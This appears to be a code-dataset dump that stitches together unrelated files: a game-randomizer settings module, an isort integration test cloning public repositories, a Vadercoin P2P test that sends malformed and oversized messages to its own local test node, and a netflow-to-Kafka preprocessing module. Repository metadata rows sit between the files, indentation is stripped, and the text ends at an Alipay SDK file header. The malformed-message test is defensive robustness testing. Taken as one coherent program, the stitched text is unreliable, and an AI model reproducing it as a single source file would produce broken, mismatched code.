val = str(self.__dict__[setting.name])
output += name + val + '\n'
return output
def get_settings_string(self):
bits = []
for setting in filter(lambda s: s.shared and s.bitwidth > 0, setting_infos):
value = self.__dict__[setting.name]
i_bits = []
if setting.type == bool:
i_bits = [ 1 if value else 0 ]
if setting.type == str:
try:
index = setting.choice_list.index(value)
except ValueError:
index = setting.choice_list.index(setting.default)
# https://stackoverflow.com/questions/10321978/integer-to-bitfield-as-a-list
i_bits = [1 if digit=='1' else 0 for digit in bin(index)[2:]]
i_bits.reverse()
if setting.type == int:
value = int(value)
value = value - (setting.gui_params.get('min', 0))
value = int(value / (setting.gui_params.get('step', 1)))
value = min(value, (setting.gui_params.get('max', value)))
# https://stackoverflow.com/questions/10321978/integer-to-bitfield-as-a-list
i_bits = [1 if digit=='1' else 0 for digit in bin(value)[2:]]
i_bits.reverse()
if setting.type == list:
if len(value) > len(setting.choice_list) / 2:
value = [item for item in setting.choice_list if item not in value]
terminal = [1] * setting.bitwidth
else:
terminal = [0] * setting.bitwidth
item_indexes = []
for item in value:
try:
item_indexes.append(setting.choice_list.index(item))
except ValueError:
continue
item_indexes.sort()
for index in item_indexes:
item_bits = [1 if digit=='1' else 0 for digit in bin(index+1)[2:]]
item_bits.reverse()
item_bits += [0] * ( setting.bitwidth - len(item_bits) )
i_bits.extend(item_bits)
i_bits.extend(terminal)
# pad it
i_bits += [0] * ( setting.bitwidth - len(i_bits) )
bits += i_bits
return bit_string_to_text(bits)
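    # Note (editor's sketch): get_settings_string and update_with_settings_string are intended to be
    # inverses over the shared, encoded settings, so calling
    # settings.update_with_settings_string(settings.get_settings_string()) should reproduce every
    # such setting (list-valued settings may come back in a different order) while recomputing
    # settings_string and numeric_seed.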
def update_with_settings_string(self, text):
bits = text_to_bit_string(text)
for setting in filter(lambda s: s.shared and s.bitwidth > 0, setting_infos):
cur_bits = bits[:setting.bitwidth]
bits = bits[setting.bitwidth:]
value = None
if setting.type == bool:
value = True if cur_bits[0] == 1 else False
if setting.type == str:
index = 0
for b in range(setting.bitwidth):
index |= cur_bits[b] << b
value = setting.choice_list[index]
if setting.type == int:
value = 0
for b in range(setting.bitwidth):
value |= cur_bits[b] << b
value = value * setting.gui_params.get('step', 1)
value = value + setting.gui_params.get('min', 0)
if setting.type == list:
value = []
max_index = (1 << setting.bitwidth) - 1
while True:
index = 0
for b in range(setting.bitwidth):
index |= cur_bits[b] << b
if index == 0:
break
if index == max_index:
value = [item for item in setting.choice_list if item not in value]
break
value.append(setting.choice_list[index-1])
cur_bits = bits[:setting.bitwidth]
bits = bits[setting.bitwidth:]
self.__dict__[setting.name] = value
self.settings_string = self.get_settings_string()
self.numeric_seed = self.get_numeric_seed()
def get_numeric_seed(self):
# salt seed with the settings, and hash to get a numeric seed
distribution = json.dumps(self.distribution.to_json(include_output=False), sort_keys=True)
full_string = self.settings_string + distribution + __version__ + self.seed
return int(hashlib.sha256(full_string.encode('utf-8')).hexdigest(), 16)
def sanitize_seed(self):
# leave only alphanumeric and some punctuation
self.seed = re.sub(r'[^a-zA-Z0-9_-]', '', self.seed, re.UNICODE)
def update_seed(self, seed):
if seed is None or seed == '':
# https://stackoverflow.com/questions/2257441/random-string-generation-with-upper-case-letters-and-digits-in-python
self.seed = ''.join(random_choices(string.ascii_uppercase + string.digits, k=10))
else:
self.seed = seed
self.sanitize_seed()
self.numeric_seed = self.get_numeric_seed()
def update(self):
self.settings_string = self.get_settings_string()
self.numeric_seed = self.get_numeric_seed()
def load_distribution(self):
if self.enable_distribution_file:
if self.distribution_file:
try:
self.distribution = Distribution.from_file(self, self.distribution_file)
except FileNotFoundError:
logging.getLogger('').warning("Distribution file not found at %s" % (self.distribution_file))
self.enable_distribution_file = False
else:
logging.getLogger('').warning("Plandomizer enabled, but no distribution file provided.")
self.enable_distribution_file = False
elif self.distribution_file:
logging.getLogger('').warning("Distribution file provided, but using it not enabled. "
"Did you mean to set enable_distribution_file?")
else:
self.distribution = Distribution(self)
self.reset_distribution()
self.numeric_seed = self.get_numeric_seed()
def reset_distribution(self):
self.distribution.reset()
for location in self.disabled_locations:
self.distribution.add_location(location, '#Junk')
def check_dependency(self, setting_name, check_random=True):
return self.get_dependency(setting_name, check_random) == None
def get_dependency(self, setting_name, check_random=True):
info = get_setting_info(setting_name)
if check_random and 'randomize_key' in info.gui_params and self.__dict__[info.gui_params['randomize_key']]:
return info.disabled_default
elif info.dependency != None:
return info.disabled_default if info.dependency(self) else None
else:
return None
def remove_disabled(self):
for info in setting_infos:
if info.dependency != None:
new_value = self.get_dependency(info.name)
if new_value != None:
self.__dict__[info.name] = new_value
self._disabled.add(info.name)
self.settings_string = self.get_settings_string()
self.numeric_seed = self.get_numeric_seed()
def resolve_random_settings(self, cosmetic, randomize_key=None):
sorted_infos = list(setting_infos)
sort_key = lambda info: 0 if info.dependency is None else 1
sorted_infos.sort(key=sort_key)
randomize_keys_enabled = set()
for info in sorted_infos:
# only randomize cosmetics options or non-cosmetic
if cosmetic == info.shared:
continue
if self.check_dependency(info.name, check_random=True):
continue
if 'randomize_key' not in info.gui_params:
continue
if randomize_key is not None and info.gui_params['randomize_key'] != randomize_key:
continue
if self.__dict__[info.gui_params['randomize_key']]:
randomize_keys_enabled.add(info.gui_params['randomize_key'])
choices, weights = zip(*info.gui_params['distribution'])
self.__dict__[info.name] = random_choices(choices, weights=weights)[0]
# Second pass to make sure disabled settings are set properly.
# Stupid hack: disable randomize keys, then re-enable.
for randomize_keys in randomize_keys_enabled:
self.__dict__[randomize_keys] = False
for info in sorted_infos:
if cosmetic == info.shared:
continue
dependency = self.get_dependency(info.name, check_random=False)
if dependency is None:
continue
self.__dict__[info.name] = dependency
for randomize_keys in randomize_keys_enabled:
self.__dict__[randomize_keys] = True
# add the settings as fields, and calculate information based on them
def __init__(self, settings_dict):
self.__dict__.update(settings_dict)
for info in setting_infos:
if info.name not in self.__dict__:
self.__dict__[info.name] = info.default
if self.world_count < 1:
self.world_count = 1
if self.world_count > 255:
self.world_count = 255
self._disabled = set()
self.settings_string = self.get_settings_string()
self.distribution = Distribution(self)
self.update_seed(self.seed)
def to_json(self):
return {setting.name: self.__dict__[setting.name] for setting in setting_infos
if setting.shared and setting.name not in self._disabled}
def to_json_cosmetics(self):
return {setting.name: self.__dict__[setting.name] for setting in setting_infos if setting.cosmetic}
# gets the randomizer settings, whether to open the gui, and the logger level from command line arguments
def get_settings_from_command_line_args():
parser = argparse.ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('--gui', help='Launch the GUI', action='store_true')
parser.add_argument('--loglevel', default='info', const='info', nargs='?', choices=['error', 'info', 'warning', 'debug'], help='Select level of logging for output.')
parser.add_argument('--settings_string', help='Provide sharable settings using a settings string. This will override all flags that it specifies.')
parser.add_argument('--convert_settings', help='Only convert the specified settings to a settings string. If a settings string is specified output the used settings instead.', action='store_true')
    parser.add_argument('--settings', help='Use the specified settings file for generation')
parser.add_argument('--seed', help='Generate the specified seed.')
parser.add_argument('--no_log', help='Suppresses the generation of a log file.', action='store_true')
parser.add_argument('--output_settings', help='Always outputs a settings.json file even when spoiler is enabled.', action='store_true')
args = parser.parse_args()
if args.settings == '-':
settings = Settings(json.loads(sys.stdin.read()))
else:
settingsFile = local_path(args.settings or 'settings.sav')
try:
with open(settingsFile) as f:
settings = Settings(json.load(f))
except Exception as ex:
if args.settings is None:
settings = Settings({})
else:
raise ex
settings.output_settings = args.output_settings
if args.settings_string is not None:
settings.update_with_settings_string(args.settings_string)
if args.seed is not None:
settings.update_seed(args.seed)
if args.convert_settings:
if args.settings_string is not None:
print(json.dumps(settings.to_json()))
else:
print(settings.get_settings_string())
sys.exit(0)
return settings, args.gui, args.loglevel, args.no_log
| 39.030726
| 200
| 0.600229
|
cdd8502271c2b5a9ac55c43a0ea087bc44e8296a
| 5,139
|
py
|
Python
|
tests/integration/test_projects_using_isort.py
|
jdufresne/isort
|
3ddd965c018a65d0bccfbef9af70dab6224e981d
|
[
"MIT"
] | 1,587
|
2020-08-24T03:07:20.000Z
|
2022-03-31T20:10:06.000Z
|
tests/integration/test_projects_using_isort.py
|
jdufresne/isort
|
3ddd965c018a65d0bccfbef9af70dab6224e981d
|
[
"MIT"
] | 446
|
2020-08-24T04:59:41.000Z
|
2022-03-30T21:48:34.000Z
|
tests/integration/test_projects_using_isort.py
|
jdufresne/isort
|
3ddd965c018a65d0bccfbef9af70dab6224e981d
|
[
"MIT"
] | 170
|
2020-08-25T15:09:46.000Z
|
2022-03-30T13:46:48.000Z
|
"""Tests projects that use isort to see if any differences are found between
their current imports and what isort suggests on the develop branch.
This is an important early warning signal of regressions.
NOTE: If you use isort within a public repository, please feel empowered to add your project here!
It is important to isort that as few regressions as possible are experienced by our users.
Having your project tested here is the surest way to keep those regressions from ever happening.
"""
from pathlib import Path
from subprocess import check_call
from typing import Sequence
from isort.main import main
def git_clone(repository_url: str, directory: Path):
"""Clones the given repository into the given directory path"""
check_call(["git", "clone", "--depth", "1", repository_url, str(directory)])
def run_isort(arguments: Sequence[str]):
"""Runs isort in diff and check mode with the given arguments"""
main(["--check-only", "--diff", *arguments])
def test_django(tmpdir):
git_clone("https://github.com/django/django.git", tmpdir)
run_isort(
str(target_dir) for target_dir in (tmpdir / "django", tmpdir / "tests", tmpdir / "scripts")
)
def test_plone(tmpdir):
git_clone("https://github.com/plone/plone.app.multilingualindexes.git", tmpdir)
run_isort([str(tmpdir / "src"), "--skip", "languagefallback.py"])
def test_pandas(tmpdir):
# Need to limit extensions as isort has just made sorting pxd the default, and pandas
    # will not have picked it up yet
# TODO: Remove below line as soon as these files are sorted on the mainline pandas project
git_clone("https://github.com/pandas-dev/pandas.git", tmpdir)
limit_extensions = ("--ext", "py", "--ext", "pyi", "--ext", "pyx")
run_isort((str(tmpdir / "pandas"), "--skip", "__init__.py", *limit_extensions))
def test_fastapi(tmpdir):
git_clone("https://github.com/tiangolo/fastapi.git", tmpdir)
run_isort([str(tmpdir / "fastapi")])
def test_zulip(tmpdir):
git_clone("https://github.com/zulip/zulip.git", tmpdir)
run_isort((str(tmpdir), "--skip", "__init__.pyi"))
def test_habitat_lab(tmpdir):
git_clone("https://github.com/facebookresearch/habitat-lab.git", tmpdir)
run_isort([str(tmpdir)])
def test_tmuxp(tmpdir):
git_clone("https://github.com/tmux-python/tmuxp.git", tmpdir)
run_isort(
[
str(tmpdir),
"--skip",
"cli.py",
"--skip",
"test_workspacebuilder.py",
"--skip",
"test_cli.py",
"--skip",
"workspacebuilder.py",
]
)
def test_websockets(tmpdir):
git_clone("https://github.com/aaugustin/websockets.git", tmpdir)
run_isort((str(tmpdir), "--skip", "example", "--skip", "docs", "--skip", "compliance"))
def test_airflow(tmpdir):
git_clone("https://github.com/apache/airflow.git", tmpdir)
run_isort([str(tmpdir), "--skip-glob", "*/_vendor/*", "--skip", "tests"])
def test_typeshed(tmpdir):
git_clone("https://github.com/python/typeshed.git", tmpdir)
run_isort(
(
str(tmpdir),
"--skip",
"tests",
"--skip",
"scripts",
"--skip",
f"{tmpdir}/third_party/2and3/yaml/__init__.pyi",
"--skip",
"builtins.pyi",
"--skip",
"ast.pyi",
)
)
def test_pylint(tmpdir):
git_clone("https://github.com/PyCQA/pylint.git", tmpdir)
run_isort([str(tmpdir)])
def test_poetry(tmpdir):
git_clone("https://github.com/python-poetry/poetry.git", tmpdir)
run_isort((str(tmpdir), "--skip", "tests"))
def test_hypothesis(tmpdir):
git_clone("https://github.com/HypothesisWorks/hypothesis.git", tmpdir)
run_isort(
(str(tmpdir), "--skip", "tests", "--profile", "black", "--ca", "--project", "hypothesis")
)
def test_pillow(tmpdir):
git_clone("https://github.com/python-pillow/Pillow.git", tmpdir)
run_isort((str(tmpdir), "--skip", "tests"))
def test_attrs(tmpdir):
git_clone("https://github.com/python-attrs/attrs.git", tmpdir)
run_isort(
(
str(tmpdir),
"--skip",
"tests",
"--ext",
"py",
"--skip",
"_compat.py",
)
)
def test_datadog_integrations_core(tmpdir):
git_clone("https://github.com/DataDog/integrations-core.git", tmpdir)
run_isort([str(tmpdir), "--skip", "docs"])
def test_pyramid(tmpdir):
git_clone("https://github.com/Pylons/pyramid.git", tmpdir)
run_isort(
str(target_dir)
for target_dir in (tmpdir / "src" / "pyramid", tmpdir / "tests", tmpdir / "setup.py")
)
def test_products_zopetree(tmpdir):
git_clone("https://github.com/jugmac00/Products.ZopeTree.git", tmpdir)
run_isort([str(tmpdir)])
def test_dobby(tmpdir):
git_clone("https://github.com/rocketDuck/dobby.git", tmpdir)
run_isort([str(tmpdir / "tests"), str(tmpdir / "src")])
def test_zope(tmpdir):
git_clone("https://github.com/zopefoundation/Zope.git", tmpdir)
run_isort([str(tmpdir)])
| 30.052632
| 99
| 0.633975
|
6be021deeb98a11d711efe58911ce4703d52e282
| 11,348
|
py
|
Python
|
test/functional/p2p_invalid_messages.py
|
VaderCoinProject/vadercoin
|
b513c794b014d40e5aad281dd1f54845c46d216c
|
[
"MIT"
] | null | null | null |
test/functional/p2p_invalid_messages.py
|
VaderCoinProject/vadercoin
|
b513c794b014d40e5aad281dd1f54845c46d216c
|
[
"MIT"
] | null | null | null |
test/functional/p2p_invalid_messages.py
|
VaderCoinProject/vadercoin
|
b513c794b014d40e5aad281dd1f54845c46d216c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2015-2020 The Vadercoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test node responses to invalid network messages."""
import struct
import time
from test_framework.messages import (
CBlockHeader,
CInv,
MAX_HEADERS_RESULTS,
MAX_INV_SIZE,
MAX_PROTOCOL_MESSAGE_LENGTH,
msg_getdata,
msg_headers,
msg_inv,
msg_ping,
MSG_TX,
msg_version,
ser_string,
)
from test_framework.p2p import (
P2PDataStore,
P2PInterface,
)
from test_framework.test_framework import VadercoinTestFramework
from test_framework.util import (
assert_equal,
hex_str_to_bytes,
)
VALID_DATA_LIMIT = MAX_PROTOCOL_MESSAGE_LENGTH - 5 # Account for the 5-byte length prefix
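# Worked note (added for clarity): msg_unrecognized below serialises its payload
# with ser_string(), which prepends a CompactSize length prefix. For payloads of
# several megabytes that prefix is 5 bytes (0xfe marker + 4-byte length), so a
# payload of exactly VALID_DATA_LIMIT bytes serialises to
# MAX_PROTOCOL_MESSAGE_LENGTH bytes on the wire, which is the property
# test_resource_exhaustion() asserts further down.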
class msg_unrecognized:
"""Nonsensical message. Modeled after similar types in test_framework.messages."""
msgtype = b'badmsg\x01'
def __init__(self, *, str_data):
self.str_data = str_data.encode() if not isinstance(str_data, bytes) else str_data
def serialize(self):
return ser_string(self.str_data)
def __repr__(self):
return "{}(data={})".format(self.msgtype, self.str_data)
class SenderOfAddrV2(P2PInterface):
def wait_for_sendaddrv2(self):
self.wait_until(lambda: 'sendaddrv2' in self.last_message)
class InvalidMessagesTest(VadercoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.extra_args = [["-whitelist=addr@127.0.0.1"]]
def run_test(self):
self.test_buffer()
self.test_duplicate_version_msg()
self.test_magic_bytes()
self.test_checksum()
self.test_size()
self.test_msgtype()
self.test_addrv2_empty()
self.test_addrv2_no_addresses()
self.test_addrv2_too_long_address()
self.test_addrv2_unrecognized_network()
self.test_oversized_inv_msg()
self.test_oversized_getdata_msg()
self.test_oversized_headers_msg()
self.test_resource_exhaustion()
def test_buffer(self):
self.log.info("Test message with header split across two buffers is received")
conn = self.nodes[0].add_p2p_connection(P2PDataStore())
# Create valid message
msg = conn.build_message(msg_ping(nonce=12345))
cut_pos = 12 # Chosen at an arbitrary position within the header
# Send message in two pieces
before = self.nodes[0].getnettotals()['totalbytesrecv']
conn.send_raw_message(msg[:cut_pos])
# Wait until node has processed the first half of the message
self.wait_until(lambda: self.nodes[0].getnettotals()['totalbytesrecv'] != before)
middle = self.nodes[0].getnettotals()['totalbytesrecv']
# If this assert fails, we've hit an unlikely race
# where the test framework sent a message in between the two halves
assert_equal(middle, before + cut_pos)
conn.send_raw_message(msg[cut_pos:])
conn.sync_with_ping(timeout=1)
self.nodes[0].disconnect_p2ps()
def test_duplicate_version_msg(self):
self.log.info("Test duplicate version message is ignored")
conn = self.nodes[0].add_p2p_connection(P2PDataStore())
with self.nodes[0].assert_debug_log(['redundant version message from peer']):
conn.send_and_ping(msg_version())
self.nodes[0].disconnect_p2ps()
def test_magic_bytes(self):
self.log.info("Test message with invalid magic bytes disconnects peer")
conn = self.nodes[0].add_p2p_connection(P2PDataStore())
with self.nodes[0].assert_debug_log(['Header error: Wrong MessageStart ffffffff received']):
msg = conn.build_message(msg_unrecognized(str_data="d"))
# modify magic bytes
msg = b'\xff' * 4 + msg[4:]
conn.send_raw_message(msg)
conn.wait_for_disconnect(timeout=1)
self.nodes[0].disconnect_p2ps()
def test_checksum(self):
self.log.info("Test message with invalid checksum logs an error")
conn = self.nodes[0].add_p2p_connection(P2PDataStore())
with self.nodes[0].assert_debug_log(['Header error: Wrong checksum (badmsg, 2 bytes), expected 78df0a04 was ffffffff']):
msg = conn.build_message(msg_unrecognized(str_data="d"))
# Checksum is after start bytes (4B), message type (12B), len (4B)
cut_len = 4 + 12 + 4
# modify checksum
msg = msg[:cut_len] + b'\xff' * 4 + msg[cut_len + 4:]
conn.send_raw_message(msg)
conn.sync_with_ping(timeout=1)
# Check that traffic is accounted for (24 bytes header + 2 bytes payload)
assert_equal(self.nodes[0].getpeerinfo()[0]['bytesrecv_per_msg']['*other*'], 26)
self.nodes[0].disconnect_p2ps()
def test_size(self):
self.log.info("Test message with oversized payload disconnects peer")
conn = self.nodes[0].add_p2p_connection(P2PDataStore())
with self.nodes[0].assert_debug_log(['Header error: Size too large (badmsg, 33554433 bytes)']):
msg = msg_unrecognized(str_data="d" * (VALID_DATA_LIMIT + 1))
msg = conn.build_message(msg)
conn.send_raw_message(msg)
conn.wait_for_disconnect(timeout=1)
self.nodes[0].disconnect_p2ps()
def test_msgtype(self):
self.log.info("Test message with invalid message type logs an error")
conn = self.nodes[0].add_p2p_connection(P2PDataStore())
with self.nodes[0].assert_debug_log(['Header error: Invalid message type']):
msg = msg_unrecognized(str_data="d")
msg = conn.build_message(msg)
# Modify msgtype
msg = msg[:7] + b'\x00' + msg[7 + 1:]
conn.send_raw_message(msg)
conn.sync_with_ping(timeout=1)
# Check that traffic is accounted for (24 bytes header + 2 bytes payload)
assert_equal(self.nodes[0].getpeerinfo()[0]['bytesrecv_per_msg']['*other*'], 26)
self.nodes[0].disconnect_p2ps()
def test_addrv2(self, label, required_log_messages, raw_addrv2):
node = self.nodes[0]
conn = node.add_p2p_connection(SenderOfAddrV2())
# Make sure vadercoind signals support for ADDRv2, otherwise this test
# will bombard an old node with messages it does not recognize which
# will produce unexpected results.
conn.wait_for_sendaddrv2()
self.log.info('Test addrv2: ' + label)
msg = msg_unrecognized(str_data=b'')
msg.msgtype = b'addrv2'
with node.assert_debug_log(required_log_messages):
# override serialize() which would include the length of the data
msg.serialize = lambda: raw_addrv2
conn.send_raw_message(conn.build_message(msg))
conn.sync_with_ping()
node.disconnect_p2ps()
def test_addrv2_empty(self):
self.test_addrv2('empty',
[
'received: addrv2 (0 bytes)',
'ProcessMessages(addrv2, 0 bytes): Exception',
'end of data',
],
b'')
def test_addrv2_no_addresses(self):
self.test_addrv2('no addresses',
[
'received: addrv2 (1 bytes)',
],
hex_str_to_bytes('00'))
def test_addrv2_too_long_address(self):
self.test_addrv2('too long address',
[
'received: addrv2 (525 bytes)',
'ProcessMessages(addrv2, 525 bytes): Exception',
'Address too long: 513 > 512',
],
hex_str_to_bytes(
'01' + # number of entries
'61bc6649' + # time, Fri Jan 9 02:54:25 UTC 2009
'00' + # service flags, COMPACTSIZE(NODE_NONE)
'01' + # network type (IPv4)
'fd0102' + # address length (COMPACTSIZE(513))
'ab' * 513 + # address
'208d')) # port
def test_addrv2_unrecognized_network(self):
now_hex = struct.pack('<I', int(time.time())).hex()
self.test_addrv2('unrecognized network',
[
'received: addrv2 (25 bytes)',
'IP 9.9.9.9 mapped',
'Added 1 addresses',
],
hex_str_to_bytes(
'02' + # number of entries
# this should be ignored without impeding acceptance of subsequent ones
now_hex + # time
'01' + # service flags, COMPACTSIZE(NODE_NETWORK)
'99' + # network type (unrecognized)
'02' + # address length (COMPACTSIZE(2))
'ab' * 2 + # address
'208d' + # port
# this should be added:
now_hex + # time
'01' + # service flags, COMPACTSIZE(NODE_NETWORK)
'01' + # network type (IPv4)
'04' + # address length (COMPACTSIZE(4))
'09' * 4 + # address
'208d')) # port
def test_oversized_msg(self, msg, size):
msg_type = msg.msgtype.decode('ascii')
self.log.info("Test {} message of size {} is logged as misbehaving".format(msg_type, size))
with self.nodes[0].assert_debug_log(['Misbehaving', '{} message size = {}'.format(msg_type, size)]):
self.nodes[0].add_p2p_connection(P2PInterface()).send_and_ping(msg)
self.nodes[0].disconnect_p2ps()
def test_oversized_inv_msg(self):
size = MAX_INV_SIZE + 1
self.test_oversized_msg(msg_inv([CInv(MSG_TX, 1)] * size), size)
def test_oversized_getdata_msg(self):
size = MAX_INV_SIZE + 1
self.test_oversized_msg(msg_getdata([CInv(MSG_TX, 1)] * size), size)
def test_oversized_headers_msg(self):
size = MAX_HEADERS_RESULTS + 1
self.test_oversized_msg(msg_headers([CBlockHeader()] * size), size)
def test_resource_exhaustion(self):
self.log.info("Test node stays up despite many large junk messages")
conn = self.nodes[0].add_p2p_connection(P2PDataStore())
conn2 = self.nodes[0].add_p2p_connection(P2PDataStore())
msg_at_size = msg_unrecognized(str_data="b" * VALID_DATA_LIMIT)
assert len(msg_at_size.serialize()) == MAX_PROTOCOL_MESSAGE_LENGTH
self.log.info("(a) Send 80 messages, each of maximum valid data size (4MB)")
for _ in range(80):
conn.send_message(msg_at_size)
# Check that, even though the node is being hammered by nonsense from one
# connection, it can still service other peers in a timely way.
self.log.info("(b) Check node still services peers in a timely way")
for _ in range(20):
conn2.sync_with_ping(timeout=2)
self.log.info("(c) Wait for node to drop junk messages, while remaining connected")
conn.sync_with_ping(timeout=400)
# Despite being served up a bunch of nonsense, the peers should still be connected.
assert conn.is_connected
assert conn2.is_connected
self.nodes[0].disconnect_p2ps()
if __name__ == '__main__':
InvalidMessagesTest().main()
| 40.528571
| 128
| 0.626895
|
43d623dba085ff8fa0c6a50c9ff32fdeff4a41b4
| 1,976
|
py
|
Python
|
code/lib/fitting.py
|
andim/paper-tcellimprint
|
e89605e51014fa3f347f96bab3d3d84c2b013a2f
|
[
"MIT"
] | 2
|
2020-07-28T10:47:40.000Z
|
2021-11-14T20:07:21.000Z
|
code/lib/fitting.py
|
andim/paper-tcellimprint
|
e89605e51014fa3f347f96bab3d3d84c2b013a2f
|
[
"MIT"
] | null | null | null |
code/lib/fitting.py
|
andim/paper-tcellimprint
|
e89605e51014fa3f347f96bab3d3d84c2b013a2f
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
import scipy.optimize
import scipy.special  # zeta() is used in discrete_loglikelihood below
from .config import *
def powerlaw(size=1, xmin=1.0, alpha=2.0):
""" Draw examples from a discrete power-law.
Uses an approximate transformation technique, see Eq. D6 in Clauset et al. arXiv 0706.1062v2 for details.
"""
r = np.random.rand(int(size))
return np.floor((xmin - 0.5)*(1.0-r)**(-1.0/(alpha-1.0)) + 0.5)
def mle_alpha(c, cmin=1.0, continuitycorrection=True):
"""Maximum likelihood estimate of the power-law exponent.
see Eq. B17 in Clauset et al. arXiv 0706.1062v2
"""
c = np.asarray(c)
c = c[c>=cmin]
if continuitycorrection:
return 1.0 + len(c)/np.sum(np.log(c/(cmin-0.5)))
return 1.0 + len(c)/np.sum(np.log(c/cmin))
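# --- illustrative usage (added for clarity; not part of the original module) ---
# A minimal sketch, assuming the synthetic generator `powerlaw` above gives a fair
# test of the estimator: for a reasonably large sample the continuity-corrected
# MLE should land close to the true exponent. The sample size and target alpha
# below are arbitrary illustration values.
def _example_mle_alpha_usage():
    counts = powerlaw(size=10000, xmin=1.0, alpha=2.5)  # synthetic power-law sample
    alpha_hat = mle_alpha(counts, cmin=1.0)             # continuity-corrected estimate
    return alpha_hat                                    # expected to be close to 2.5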
def discrete_loglikelihood(x, alpha, xmin):
x = x[x>=xmin]
n = len(x)
return -n*np.log(scipy.special.zeta(alpha, xmin)) - alpha*np.sum(np.log(x))
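# Worked note (added for clarity): for a discrete power-law with support x >= xmin,
# the pmf is p(x) = x**(-alpha) / zeta(alpha, xmin), so for n observations the
# log-likelihood reduces to
#     log L(alpha) = -n * log(zeta(alpha, xmin)) - alpha * sum(log(x_i))
# which is exactly the expression returned above.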
def mle_alpha_discrete(c, cmin=1.0, **kwargs):
"""Maximum likelihood estimate of the power-law exponent for discrete data.
Numerically maximizes the discrete loglikelihood.
kwargs are passed to scipy.optimize.minimize_scalar.
Default kwargs: bounds=[1.5, 4.5], method='bounded'
"""
optkwargs = dict(bounds=[1.5, 4.5], method='bounded')
optkwargs.update(kwargs)
c = np.asarray(c)
c = c[c>=cmin]
result = scipy.optimize.minimize_scalar(lambda alpha: -discrete_loglikelihood(c, alpha, cmin), **optkwargs)
if not result.success:
raise Exception('fitting failed')
return result.x
@np.vectorize
def naive_percentage(t):
naivefit = pd.read_csv(data_directory + 'naive_fit.csv', index_col=0, header=None)
intercept, slope = float(naivefit.loc['intercept']), float(naivefit.loc['slope'])
intercept_early, slope_early = float(naivefit.loc['intercept_early']), float(naivefit.loc['slope_early'])
if t < 5:
return intercept_early*np.exp(slope_early*t)
return intercept*np.exp(slope*t)
| 35.285714
| 111
| 0.674595
|
68d4e3555174c23ca28c826baa7e80dc668ca84e
| 3,837
|
py
|
Python
|
distributed/d_collector/pipelines/flow.py
|
shield-h2020/collectors
|
cc0e3be030be946d9e4cd5c03e6ac675cc58d9d0
|
[
"Apache-2.0"
] | null | null | null |
distributed/d_collector/pipelines/flow.py
|
shield-h2020/collectors
|
cc0e3be030be946d9e4cd5c03e6ac675cc58d9d0
|
[
"Apache-2.0"
] | null | null | null |
distributed/d_collector/pipelines/flow.py
|
shield-h2020/collectors
|
cc0e3be030be946d9e4cd5c03e6ac675cc58d9d0
|
[
"Apache-2.0"
] | null | null | null |
'''
Methods that will be used to process and prepare netflow data, before being sent to
Kafka cluster.
'''
import logging
import re
import sys
import tempfile
from datetime import datetime
from ..utils import popen
COMMAND = 'nfdump -r {0} -o csv {1} > {2}'
EPOCH = datetime(1970, 1, 1)
def convert(netflow, tmpdir, opts='', prefix=None):
'''
Convert `nfcapd` file to a comma-separated output format.
:param netflow : Path of binary file.
:param tmpdir : Path of local staging area.
:param opts : A set of options for `nfdump` command.
:param prefix : If `prefix` is specified, the file name will begin with that;
otherwise, a default `prefix` is used.
:returns : Path of CSV-converted file.
:rtype : ``str``
:raises OSError: If an error occurs while executing the `nfdump` command.
'''
logger = logging.getLogger('SHIELD.DC.PROCESS.FLOW')
with tempfile.NamedTemporaryFile(prefix=prefix, dir=tmpdir, delete=False) as fp:
command = COMMAND.format(netflow, opts, fp.name)
popen(command, raises=True)
return fp.name
def prepare(csvfile, max_req_size):
'''
Prepare text-formatted data for transmission through the Kafka cluster.
This method takes a CSV file and groups it into segments, according to the
pattern '%Y%m%d%h'. If the size of each segment is greater than the maximum size
of a request, then divides each segment into smaller ones so that they can be
transmitted.
:param csvfile : Path of CSV-converted file; result of `convert` method.
:param max_req_size: The maximum size of a request.
:returns : A generator which yields the timestamp (in milliseconds) and a
list of lines from the CSV-converted file.
:rtype : :class:`types.GeneratorType`
    :raises IOError      : If the given file contains no valid lines.
'''
msg_list = []
msg_size = segmentid = 0
logger = logging.getLogger('SHIELD.DC.PROCESS.FLOW')
partition = timestamp = None
pattern = re.compile('[0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}:[0-9]{2}')
with open(csvfile, 'r') as fp:
for line in fp:
value = line.strip()
if not value: continue
match = pattern.search(value.split(',')[0])
if not match: continue
size = sys.getsizeof(value)
# .........................assume the first 13 characters of the `search`
# result as the `partition`, e.g. '2018-03-20 09'
if match.group()[:13] == partition and (msg_size + size) < max_req_size:
msg_list.append(value)
msg_size += size
continue
# .........................if the hour is different or the message size is
# above the maximum, then yield existing list and continue with an empty one
if timestamp:
logger.debug('Yield segment-{0}: {1} lines, {2} bytes'.format(segmentid,
len(msg_list), msg_size))
segmentid += 1
yield (int(timestamp.total_seconds() * 1000), msg_list)
msg_list = [value]
msg_size = size
partition = match.group()[:13]
timestamp = datetime.strptime(match.group(), '%Y-%m-%d %H:%M:%S') - EPOCH
# .................................send the last lines from the file. The check of
# `timestamp` is in case the file is empty and `timestamp` is still ``None``
if not timestamp:
raise IOError('CSV-converted file has no valid lines.')
logger.debug('Yield segment-{0}: {1} lines, {2} bytes'.format(segmentid,
len(msg_list), msg_size))
yield (int(timestamp.total_seconds() * 1000), msg_list)
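# --- illustrative usage (added for clarity; not part of the original pipeline) ---
# A minimal sketch, assuming a hypothetical `producer` object with a
# `send(topic, key, value)` method and a 1 MB request limit: each hourly segment
# yielded by prepare() is forwarded with its epoch-millisecond timestamp as key.
#
#     csvfile = convert('/path/to/nfcapd.capture', '/tmp/staging')
#     for timestamp_ms, lines in prepare(csvfile, max_req_size=1024 * 1024):
#         producer.send('netflow', key=str(timestamp_ms), value='\n'.join(lines))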
| 38.757576
| 88
| 0.597081
|
6831af1816c8543b9ce6249e514baab59ffdc2e8
| 4,015
|
py
|
Python
|
alipay/aop/api/request/KoubeiServindustryExercisePlanDeleteRequest.py
|
snowxmas/alipay-sdk-python-all
|
96870ced60facd96c5bce18d19371720cbda3317
|
[
"Apache-2.0"
] | 213
|
2018-08-27T16:49:32.000Z
|
